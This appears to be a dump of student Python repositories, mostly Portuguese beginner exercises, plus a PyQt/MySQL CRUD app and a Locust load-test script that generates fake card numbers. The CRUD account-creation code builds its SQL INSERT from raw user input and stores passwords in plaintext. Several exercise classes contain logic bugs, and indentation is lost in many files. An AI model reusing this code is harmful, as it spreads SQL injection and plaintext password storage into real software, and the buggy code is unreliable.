    t.join()
print('All Done!!')
``` |
{
"source": "JoaoEmanuell/Meus-Estudos-Python",
"score": 2
} |
#### File: Aulas/Mundo 3/097.py
```python
def escreva(msg):
tam = len(msg) + 4
print('~' * tam)
print(f' {msg}')
print('~' * tam)
escreva('<NAME>')
escreva('oi')
escreva('Massa')
```
#### File: Aulas/Mundo 3/098.py
```python
from time import sleep
def linha():
print('-' * 30)
def contador(i, f, p):
print('-' * 30)
print(f'Contagem de {i} ate {f} de {p} em {p}')
print('-' * 30)
if i < f:
cont = i
while cont <= f:
print(f'{cont}', end=' ')
cont += p
sleep(0.30)
else:
cont = i
while cont >= f:
print(f'{cont}', end=' ')
cont -= p
sleep(0.30)
contador(1, 10, 1)
print()
contador(10, 0, 2)
print()
linha()
print('Sua vez')
linha()
i = int(input('Inicio '))
f = int(input('Fim '))
p = int(input('Passo '))
contador(i, f, p)
```
#### File: Aulas/Mundo 3/100.py
```python
from random import randint
from time import sleep
valores = []
def aleatorio():
print('Sorteando 5 valores da lista: ', end='')
for c in range(0, 5):
valores.append(randint(1, 10))
for v in valores:
print(f'{v}', end=' ')
sleep(0.3)
def soma():
pares = 0
print(f'Somando os valores pares de {valores},', end=' ')
sleep(1)
for v in valores:
if v % 2 == 0:
pares += v
print(f'a soma de todos os valores pares é igual a {pares}')
aleatorio()
print()
soma()
```
#### File: Aulas/Mundo 3/101.py
```python
def ano(n=0):
    from datetime import date  # importing only when the function runs saves memory
idade = date.today().year - n
if idade >= 18 and idade <= 70:
return (f'Com {idade} anos o voto é \033[1:31mOBRIGATORIO\033[m')
if idade >= 16 and idade <= 17 or idade >= 65:
return (f'Com {idade} anos o voto é \033[1:31mOPCIONAL\033[m')
if idade <= 15:
return (f'Com {idade} anos \033[1:31mNão\033[m vota')
i = int(input('Em que ano você nasceu? '))
print(ano(i))
```
#### File: Meus-Estudos-Python/Exercicios Classes e Objetos/classe_bichinho_virtual++.py
```python
class bichinho():
"""[Classe bixinho, essa classe possui 6 metodos e um __init__]
"""
def __init__(self, nome, fome = 10, saude = 100, idade = 1):
"""[Inicia a classe]
Args:
nome ([str]): [Nome do bichinho]
fome (int, optional): [Porcentagem da fome do bichinho]. Defaults to 10.
saude (int, optional): [Porcentagem da saude do bichinho]. Defaults to 100.
idade (int, optional): [Idade do bichinho]. Defaults to 1.
"""
self.nome = nome
self.fome = fome
self.saude = saude
self.idade = idade
def status(self):
"""[Descreve o status do bichinho]
Returns:
[str]: [Retorna o estado do bichinho]
"""
print (f"O nome do bichinho é {self.nome}\nA fome de {self.nome} está em {self.fome}%\nA saúde de {self.nome} está em {self.saude}%\nA idade de {self.nome} é {self.idade} anos")
bichinho.novo_humor()
return (f"O nome do bichinho é {self.nome}\nA fome de {self.nome} está em {self.fome}%\nA saúde de {self.nome} está em {self.saude}%\nA idade de {self.nome} é {self.idade} anos")
def alterar_nome(self):
"""[função para alterar o nome do bichinho]
Returns:
[str]: [Retorna o novo nome do bichinho]
"""
self.nome = str(input("Qual o novo nome do bichinho? "))
print (f"O novo nome do bichinho é {self.nome}")
bichinho.novo_humor()
return (f"O novo nome do bichinho é {self.nome}")
def alterar_fome(self):
"""[função para alterar a fome do bichinho]
Returns:
[str]: [Retorna a porcentagem da fome do bichinho]
"""
self.fome = abs(int(input(f"Qual a nova porcentagem de fome de {self.nome}? ")))
print (f"A fome de {self.nome} está em {self.fome}%")
bichinho.novo_humor()
return (f"A fome de {self.nome} está em {self.fome}%")
def alterar_saude(self):
"""[função para alterar a saúde do bichinho]
Returns:
[str]: [Retorna a porcentagem da saúde do bichinho]
"""
self.saude = abs(int(input(f"Qual a nova porcentagem de saude de {self.nome}? ")))
print (f"A saúde de {self.nome} está em {self.saude}%")
bichinho.novo_humor()
return (f"A saúde de {self.nome} está em {self.saude}%")
def alterar_idade(self):
"""[Função para alterar a idade do bichinho]
Returns:
[str]: [Idade do bichinho]
"""
self.idade = abs(int(input(f"Qual a nova idade de {self.nome}? ")))
print (f"A idade de {self.nome} é {self.idade} anos")
bichinho.novo_humor()
return (f"A idade de {self.nome} é {self.idade} anos")
def novo_humor(self):
"""
[Serve para calcular o humor do bichinho, baseado na sua fome e saúde]
"""
if self.fome > 75 or self.saude < 25 or self.brincar < 2:
self.humor = print(f'{self.nome} está Irritado')
elif self.fome > 50 or self.saude < 50 or self.brincar < 5:
self.humor = print(f'{self.nome} está Triste')
elif self.fome > 25 or self.saude < 75 or self.brincar < 10:
self.humor = print(f'{self.nome} está Feliz')
else:
self.humor = print(f'{self.nome} está Muito feliz')
def brincar(self):
"""[Serve para informar quanto tempo você deseja brincar com o bichinho]
"""
tempo = abs(float(input(f"Por quanto minutos deseja brincar com {self.nome}? ")))
self.brincar = tempo
return self.brincar
bichinho = bichinho("Midas")
bichinho.brincar()
bichinho.status()
```
#### File: Meus-Estudos-Python/Exercicios Classes e Objetos/classe_carro.py
```python
class carro():
def __init__(self, consumo = 10, combustível = 0):
"""[summary]
Args:
consumo (int, optional): [consumo de gasolina por litro]. Defaults to 10.
combustível (float, optional): [quantidade total de gasolina do carro]. Defaults to 0.
"""
self.consumo = consumo
self.combustivel = combustível
def andar(self):
"""[pergunta quantos km devem ser andados, depois divide a distancia pecorrida pelo total de consumo do carro e subtrai isso do combustivel, se o combustivel for inferior a 0, o combustivel recebe 0, escreva "A gasolina acabou", chame a função obterGasolina e retorne Falso, senão escreva "O carro andou {distancia} km, e consumiu {consumo} litros de combustivel" e retorne o consumo]
Returns:
[float]: [retorna o consumo de gasolina]
"""
distancia = float(input("Deseja andar quantos km? "))
consumo = distancia / self.consumo
self.combustivel -= consumo
if self.combustivel < 0:
self.combustivel = 0
print("A gasolina acabou")
carro.obterGasolina(self)
return False
else:
print(f"O carro andou {distancia} km, e consumiu {consumo} litros de combustivel")
return consumo
def obterGasolina(self):
"""[mostra o nivel de gasolina]
Returns:
[float]: [retorna o total de combustivel do carro]
"""
print(f"O nivel de gasolina é {self.combustivel} litros")
return self.combustivel
def adicionarGasolina(self):
"""[serve para adicionar gasolina ao carro, pergunta quantos litros serão colocados, o self.combustivel += quantidade, escreve "sucesso..." retorna o numero de litros adicionados]
"""
gasolina = float(input("Quantos litros de gasolina serão colocados? "))
self.combustivel += gasolina
print(f"Sucesso, adicionado {gasolina} litros de gasolina no carro")
return(gasolina)
carrinho = carro(combustível = 100)
carrinho.andar()
carrinho.obterGasolina()
carrinho.adicionarGasolina()
carrinho.obterGasolina()
```
#### File: Meus-Estudos-Python/Exercicios Classes e Objetos/classe_conta_corrente.py
```python
class conta():
def __init__(self, num, corren, saldo = (0.0)):
"""[class de conta bancaria, def __init__]
Args:
num ([int]): [Numero da conta]
corren ([str]): [Nome do correntista]
saldo (tuple, float): [Numero do saldo da conta]. Defaults to (0.0).
"""
self.num = num
self.corren = corren
self.saldo = saldo
def alterarnome(self):
self.nome = str(input("Qual o novo nome do correntista? "))
return (f"O novo nome do correntista é {self.nome}")
def deposito(self):
self.saldo += float(input("Qual o valor a ser depositado? R$ "))
return (f"O novo saldo da conta é R$ {self.saldo}")
def saque(self):
saldo = float(input("Qual o valor a ser sacado? R$ "))
if (self.saldo < saldo):
return(f"Desculpe, o valor de saque que você deseja é superior ao seu saldo\n"
f"Seu saldo é {self.saldo}")
else:
self.saldo -= saldo
return(f"Saque realizado com sucesso\n"
f"Seu novo saldo é {self.saldo} reais")
# main code
p1 = conta(150, 'João', 1000)
```
#### File: Meus-Estudos-Python/Exercicios Classes e Objetos/classe_fazenda_de_bichinhos.py
```python
from random import randint
class bichinho():
"""[Classe bixinho, essa classe possui 6 metodos e um __init__]
"""
    def __init__(self, nome, fome=None, saude=None, idade=None, humor=100):
        """[Inicia a classe]
        Args:
            nome ([str]): [Nome do bichinho]
            fome (int, optional): [Porcentagem da fome do bichinho]. Defaults to um valor aleatório entre 1 e 100.
            saude (int, optional): [Porcentagem da saude do bichinho]. Defaults to um valor aleatório entre 1 e 100.
            idade (int, optional): [Idade do bichinho]. Defaults to um valor aleatório entre 1 e 5.
            humor (int, optional): [Humor inicial do bichinho]. Defaults to 100.
        """
        # Os valores aleatórios são sorteados aqui, e não na assinatura do método,
        # para que cada instância receba padrões diferentes.
        self.nome = nome
        self.fome = fome if fome is not None else randint(1, 100)
        self.saude = saude if saude is not None else randint(1, 100)
        self.idade = idade if idade is not None else randint(1, 5)
        self.brincarr = humor
    def status(self):
        """[Descreve o status do bichinho]
        Returns:
            [str]: [Retorna o estado do bichinho]
        """
        estado = (f"O nome do bichinho é {self.nome}\n"
                  f"A fome de {self.nome} está em {self.fome}%\n"
                  f"A saúde de {self.nome} está em {self.saude}%\n"
                  f"A idade de {self.nome} é {self.idade} anos")
        print(estado)
        self.novo_humor()
        return estado
def alterar_nome(self):
"""[função para alterar o nome do bichinho]
Returns:
[str]: [Retorna o novo nome do bichinho]
"""
self.nome = str(input("Qual o novo nome do bichinho? "))
print (f"O novo nome do bichinho é {self.nome}")
        self.novo_humor()
return (f"O novo nome do bichinho é {self.nome}")
def alterar_fome(self):
"""[função para alterar a fome do bichinho]
Returns:
[str]: [Retorna a porcentagem da fome do bichinho]
"""
self.fome = abs(int(input(f"Qual a nova porcentagem de fome de {self.nome}? ")))
print (f"A fome de {self.nome} está em {self.fome}%")
        self.novo_humor()
return (f"A fome de {self.nome} está em {self.fome}%")
def alterar_saude(self):
"""[função para alterar a saúde do bichinho]
Returns:
[str]: [Retorna a porcentagem da saúde do bichinho]
"""
self.saude = abs(int(input(f"Qual a nova porcentagem de saude de {self.nome}? ")))
print (f"A saúde de {self.nome} está em {self.saude}%")
        self.novo_humor()
return (f"A saúde de {self.nome} está em {self.saude}%")
def alterar_idade(self):
"""[Função para alterar a idade do bichinho]
Returns:
[str]: [Idade do bichinho]
"""
self.idade = abs(int(input(f"Qual a nova idade de {self.nome}? ")))
print (f"A idade de {self.nome} é {self.idade} anos")
        self.novo_humor()
return (f"A idade de {self.nome} é {self.idade} anos")
def novo_humor(self):
"""
[Serve para calcular o humor do bichinho, baseado na sua fome e saúde]
"""
        if self.fome > 75 or self.saude < 25 or self.brincarr < 2:
            self.humor = f'{self.nome} está Irritado'
        elif self.fome > 50 or self.saude < 50 or self.brincarr < 5:
            self.humor = f'{self.nome} está Triste'
        elif self.fome > 25 or self.saude < 75 or self.brincarr < 10:
            self.humor = f'{self.nome} está Feliz'
        else:
            self.humor = f'{self.nome} está Muito feliz'
        print(self.humor)
def brincar(self):
"""[Serve para informar quanto tempo você deseja brincar com o bichinho]
"""
tempo = abs(float(input(f"Por quanto minutos deseja brincar com {self.nome}? ")))
self.brincarr = tempo
return self.brincarr
class bichinho2(bichinho):
pass
class bichinho3(bichinho):
pass
Midas = bichinho("Midas")
Miriel = bichinho2("Miriel")
Asriel = bichinho3("Asriel")
Midas.status()
Miriel.status()
Asriel.status()
```
#### File: Meus-Estudos-Python/Exercicios Classes e Objetos/classe_funcionario_update.py
```python
class funcionario:
def __init__(self, nome, salario = 1000.00):
"""[init]
Args:
nome ([str]): [Nome do funcionario]
salario (float, optional): [salario do funcionario]. Defaults to 1000.00.
"""
self.nome = nome
self.salario = salario
def nome_funcionario(self):
"""[escreve f"O nome do funcionario é {self.nome}", retorna self.nome]
"""
print(f"O nome do funcionario é {self.nome}")
return(self.nome)
def salario_funcionario(self):
"""[escreve f"O salario do funcionario é {self.salario} reais", retorna self.salario]
"""
print(f"O salario do funcionario é {self.salario} reais")
return(self.salario)
def aumentar_salario(self, aumento = 10):
"""[função para aumentar o salario do funcionario]
Args:
aumento (int, optional): [Porcentagem de aumento que sera adicionada ao salario]. Defaults to 10.
"""
self.salario += (self.salario / 100) * aumento
print(f"O salario de {self.nome} é {self.salario} reais")
return(self.salario)
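# Illustrative check (assumed example, not part of the original exercise): with the
# default salary of 1000.00 and aumento=10, aumentar_salario() computes
# 1000 + (1000 / 100) * 10 = 1100.00 reais.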
fun = funcionario('Apolo')
fun.nome_funcionario()
fun.salario_funcionario()
fun.aumentar_salario()
```
#### File: Bhaskara/source/delt.py
```python
def delt(a,b,c):
dell = (b**2) - (4*a*c)
return dell
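# Illustrative usage (not part of the original file): for x^2 - 3x + 2 = 0,
# delt(1, -3, 2) returns (-3)**2 - 4*1*2 = 1, so the roots are (3 +/- 1) / 2 = 2 and 1.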
```
#### File: Projetos/Cripitografador/main.py
```python
from source import interface
import os
def main():
clear()
tela = interface.TelaPython()
tela.Iniciar()
clear()
def clear():
os.system('clear')
if __name__ == '__main__':
main()
```
#### File: Projetos/CRUD/main.py
```python
from PyQt5 import uic, QtWidgets, QtCore
from pathlib import Path
from os.path import join
from source import login_account, create_account, read_accounts
class window():
def __init__(self):
self.app = QtWidgets.QApplication([])
# Forms
self.login = self.load_ui('login.ui')
self.create = self.load_ui('create_account.ui')
self.read = self.load_ui('read_accounts.ui')
# Buttons
# Login
self.login.createAccountButton.clicked.connect(self.show_create_account)
self.login.loginAccountButton.clicked.connect(self.login_account)
# Create
self.create.createAccountButton.clicked.connect(self.create_account)
# List
self.read.saveButton.clicked.connect(self.save_user)
self.read.deleteButton.clicked.connect(self.delete_user)
# Menu
self.read.actionLogin.triggered.connect(self.show_login)
self.create.actionLogin.triggered.connect(self.show_login)
# Exec
self.login.show()
self.app.exec()
def load_ui(self, ui_file):
"""Loads the desired interface, every interface is a .ui file
Args:
ui_file ([ui]): [.ui file name]
Returns:
[ui]: [Interface loaded]
"""
path = join(Path().absolute(), 'interfaces/')
return uic.loadUi(f'{path}{ui_file}')
def show_create_account(self): self.create.show(), self.login.close()
def show_login(self): self.login.show(), self.create.close(), self.read.close() # Show login and close create, read
def login_account(self):
"""Enter the account using the username and password, if valid it will run the list_accounts function, otherwise it will return an error dialog box.
"""
self.name = str(self.login.nameInput.text()).strip()
self.password = str(self.login.passInput.text()).strip()
log = login_account.Login()
user = log.login_account(self.name, self.password)
        # login_account returns a tuple when the credentials are valid
        if type(user) != tuple:
QtWidgets.QMessageBox.about(self.login, "Alerta!", "Nome de usuario ou senha invalidos!\nInsira um nome de usuario ou senha validos e tente novamente.")
else:
self.list_accounts()
def create_account(self):
"""Create a new account.
"""
name = str(self.create.nameInput.text()).lower().strip()
password = self.create.passInput.text()
con = create_account.createAccount()
user = con.create_account(name, password)
# Valid user
if user:
QtWidgets.QMessageBox.about(self.create, "Alerta!", "Conta criada com sucesso!")
self.login.show()
self.create.close()
else :
QtWidgets.QMessageBox.about(self.create, "Alerta!", "Conta já existente!\nInsira um nome de usuario diferente e tente novamente.")
def list_accounts(self):
"""Lists the accounts already created and puts the username and password in their respective lists.
"""
# Clear the lists
self.read.listNames.clear()
self.read.listPassword.clear()
self.read.show()
self.login.close()
# Database connection
con = read_accounts.read_accounts()
# Original accounts
self.original_accounts = con.list_accounts()
# Insert the username and password in their respective lists
for account in self.original_accounts:
self.read.listNames.addItem(account[0])
self.read.listPassword.addItem(account[1])
# Allows the username and password to be changed.
for index in range(self.read.listNames.count()):
item = self.read.listNames.item(index)
item.setFlags(item.flags() | QtCore.Qt.ItemIsEditable)
for index in range(self.read.listPassword.count()):
item = self.read.listPassword.item(index)
item.setFlags(item.flags() | QtCore.Qt.ItemIsEditable)
def save_user(self):
"""Saves changes made to lists.
"""
new_names, new_passwords = [], []
# Add new usernames and passwords to the lists.
for index in range(self.read.listNames.count()): new_names.append(str(self.read.listNames.item(index).text()).lower().strip())
for index in range(self.read.listPassword.count()): new_passwords.append(str(self.read.listPassword.item(index).text()).lower().strip())
account_names = self.original_accounts
for itens in range(len(new_names)) :
# Check if the username is different from the original name.
if account_names[itens][0] != new_names[itens] :
con = read_accounts.read_accounts()
user = con.update_user_name(account_names[itens][0], new_names[itens])
# Save the new information in the variable original_accounts
self.original_accounts = con.list_accounts()
if not user:
QtWidgets.QMessageBox.about(self.read, "Alerta!", "Nome de usuario já existente!\nInsira um nome de usuario diferente e tente novamente.")
else :
QtWidgets.QMessageBox.about(self.read, "Alerta!", "Nome de usuario alterado com sucesso!")
for itens in range(len(new_passwords)) :
# Check if the password is different from the original.
if account_names[itens][1] != new_passwords[itens] :
username = self.read.listNames.item(itens).text()
con = read_accounts.read_accounts()
user = con.update_user_password(username, new_passwords[itens])
# Save the new information in the variable original_accounts
self.original_accounts = con.list_accounts()
QtWidgets.QMessageBox.about(self.read, "Alerta!", "Senha alterada com sucesso!")
def delete_user(self):
"""Deletes an account."""
        # Save pending username/password edits before deleting the account.
self.save_user()
row = self.read.listNames.currentRow()
username = self.read.listNames.item(row).text()
password = self.read.listPassword.item(row).text()
self.read.listNames.takeItem(row)
self.read.listPassword.takeItem(row)
acc = read_accounts.read_accounts()
# Delete the account in database.
acc.delete_user(username, password)
QtWidgets.QMessageBox.about(self.read, "Alerta!", "Usuario deletado com sucesso!")
# Save the new information in the variable original_accounts
self.original_accounts = acc.list_accounts()
if __name__ == '__main__':
window()
```
#### File: CRUD/source/create_account.py
```python
import mysql.connector
from mysql.connector import connection
from . import sql_essential
class createAccount(sql_essential.sql_essential):
def __init__(self):
super().__init__()
self.connection = self.create_connection()
def create_account(self, name, password):
"""[Create a new account]
Args:
name ([str]): [User name]
password ([str]): [Password]
Returns:
[bool]: [True if account was created, False if not]
"""
if self.verfiy_if_account_exists(name):
return False
else :
cursor = self.connection.cursor()
sql = f"INSERT INTO TEST (NAME, PASS) VALUES ('{name}', '{password}')"
cursor.execute(sql)
cursor.close()
self.connection.commit()
return True
def verfiy_if_account_exists(self, name):
"""[Check if the account already exists]
Args:
name ([str]): [User name]
Returns:
[bool]: [True if account exists, False if not]
"""
        cursor = self.connection.cursor()
        # Parameterized query prevents SQL injection
        sql = "SELECT NAME FROM TEST WHERE NAME = %s"
        cursor.execute(sql, (name,))
        row = cursor.fetchone()
        cursor.close()
        # fetchone() returns a tuple when the account exists, otherwise None
        return row is not None
```
#### File: Download-music-youtube/source/interface.py
```python
import PySimpleGUI as sg
from . import download
class Interface():
def __init__(self) -> None:
layout = [
[sg.Text('Link da Música ou playlist', key='playlist')],
[sg.Input(key = 'link', size=(80, 20))],
[sg.Button('Baixar Música')],
[sg.Output(size = (80, 5), key='output')]
]
self.janela = sg.Window('MUSIC-DOWNLOAD').layout(layout)
def start(self):
while True:
try:
self.event, self.values = self.janela.Read()
self.clear('output')
self.link = self.values['link']
if self.event == 'Baixar Música':
download.DownloadVerfiy(self.link)
            except Exception as error:
                print(f"Algo deu errado, portanto o download não pode ser concluido, por favor tente inserir uma nova url!\n {error}")
if self.event == sg.WIN_CLOSED:
break
def clear(self, key):
self.janela.FindElement(key).Update('')
def write(self, key, text):
self.janela.FindElement(key).Update(text)
``` |
{
"source": "joaoemilio/microservices-demo",
"score": 3
} |
#### File: docker/loadgenerator/locustfile.py
```python
import json
from locust import HttpLocust, TaskSet
from faker import Faker
import random
from random import randint
def generate_card(type=None):
"""
Prefill some values based on the card type
"""
card_types = ["visa", "mastercard", "discover"]
def prefill(t):
# typical number of digits in credit card
def_length = 16
"""
Prefill with initial numbers and return it including the total number of digits
remaining to fill
"""
if t == card_types[0]:
return [4], def_length - 1
elif t == card_types[1]:
# master card start with 5 and is 16 digits long
return [5, randint(1, 5)], def_length - 2
else:
# this section probably not even needed here
return [], def_length
def finalize(nums):
"""
        Make the current generated list pass the Luhn check by computing the check sum
        and appending the appropriate final check digit
"""
check_sum = 0
# is_even = True if (len(nums) + 1 % 2) == 0 else False
"""
        The check offset determines whether the final list will end up with an even or
        odd length, which affects how the check_sum is calculated. It also avoids
        reversing the list back and forth, as specified in the Luhn algorithm.
"""
check_offset = (len(nums) + 1) % 2
for i, n in enumerate(nums):
if (i + check_offset) % 2 == 0:
n_ = n * 2
check_sum += n_ - 9 if n_ > 9 else n_
else:
check_sum += n
        # The final % 10 keeps the check digit in 0-9 when check_sum is already a multiple of 10
        return nums + [(10 - (check_sum % 10)) % 10]
# main body
if type:
t = type.lower()
else:
t = random.choice(card_types)
if t not in card_types:
        print("Unknown type: '%s'" % type)
        print("Please pick one of these supported types: %s" % card_types)
return
initial, rem = prefill(t)
so_far = initial + [randint(1, 9) for x in range(rem - 1)]
card = "".join(map(str, finalize(so_far)))
return '-'.join(card[i:i + 4] for i in range(0, len(card), 4))[0:19]
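# Illustrative helper (not part of the original file): checks that a number produced
# by generate_card() passes the Luhn validation that finalize() is meant to satisfy.
def _luhn_valid(card):
    digits = [int(d) for d in card.replace('-', '')]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:  # double every second digit, starting from the second-to-last
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0
# Example: _luhn_valid(generate_card("visa")) should evaluate to True.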
fake = Faker()
class UserBehavior(TaskSet):
headers = {}
def on_start(self):
self.index()
products = [
'0PUK6V6EV0',
'1YMWWN1N4O',
'2ZYFJ3GM2N',
'66VCHSJNUP',
'6E92ZMYYFZ',
'9SIQT8TOJO',
'L9ECAV7KIM',
'LS4PSXUNUM',
'OLJCESPC7Z']
def index(self):
self.headers = {
"X-Forwarded-For": fake.ipv4_public(),
"User-Agent": fake.user_agent(),
}
self.client.get("/", headers=self.headers)
def setCurrency(self):
currencies = ['EUR', 'USD', 'JPY', 'CAD']
self.client.post("/setCurrency",
{'currency_code': random.choice(currencies)}, headers=self.headers)
def browseProduct(self):
self.client.get("/product/" + random.choice(self.products), headers=self.headers)
def viewCart(self):
self.client.get("/cart", headers=self.headers)
def addToCart(self):
product = random.choice(self.products)
self.client.get("/product/" + product, headers=self.headers)
self.client.post("/cart", {
'product_id': product,
'quantity': random.choice([1, 2, 3, 4, 5, 10])}, headers=self.headers)
def checkout(self):
self.addToCart()
body = {
'email': fake.email(),
'street_address': fake.street_address(),
'zip_code': fake.postalcode(),
'city': fake.city(),
'state': fake.state(),
'country': fake.country(),
'credit_card_number': generate_card(type=random.choice(["visa", "mastercard"])),
'credit_card_expiration_month': fake.credit_card_expire(start="now", end="+10y", date_format="%m"),
'credit_card_expiration_year': fake.credit_card_expire(start="now", end="+10y", date_format="%Y"),
'credit_card_cvv': fake.credit_card_security_code(),
}
self.client.post("/cart/checkout", body, headers=self.headers)
tasks = {
index: 1,
setCurrency: 1,
browseProduct: 10,
addToCart: 1,
viewCart: 3,
checkout: 1}
class WebsiteUser(HttpLocust):
task_set = UserBehavior
min_wait = 500
max_wait = 10000
``` |
{
"source": "joaoesantos/ise_learning",
"score": 3
} |
#### File: modules/models/execution_result.py
```python
class ExecutionResult:
def __init__(self, rawResult, wasError, executionTime):
self.rawResult = rawResult
self.wasError = wasError
self.executionTime = executionTime
@property
def rawResult(self):
return self.__rawResult
@rawResult.setter
def rawResult(self, rawResult):
if rawResult is None:
raise TypeError("Value code must be provided.")
self.__rawResult = rawResult
@property
def wasError(self):
return self.__wasError
@wasError.setter
def wasError(self, wasError):
if not isinstance(wasError, bool):
raise TypeError("Value wasError must be a bool.")
self.__wasError = wasError
@property
def executionTime(self):
return self.__executionTime
@executionTime.setter
def executionTime(self, executionTime):
if not isinstance(executionTime, float):
raise TypeError("Value executionTime must be a float.")
self.__executionTime = executionTime
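# Illustrative usage (assumed example, not part of the original module): the property
# setters validate their inputs, so a non-float execution time raises a TypeError.
# result = ExecutionResult("stdout text", wasError=False, executionTime=0.42)
# ExecutionResult("stdout text", wasError=False, executionTime=1)  # raises TypeError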
``` |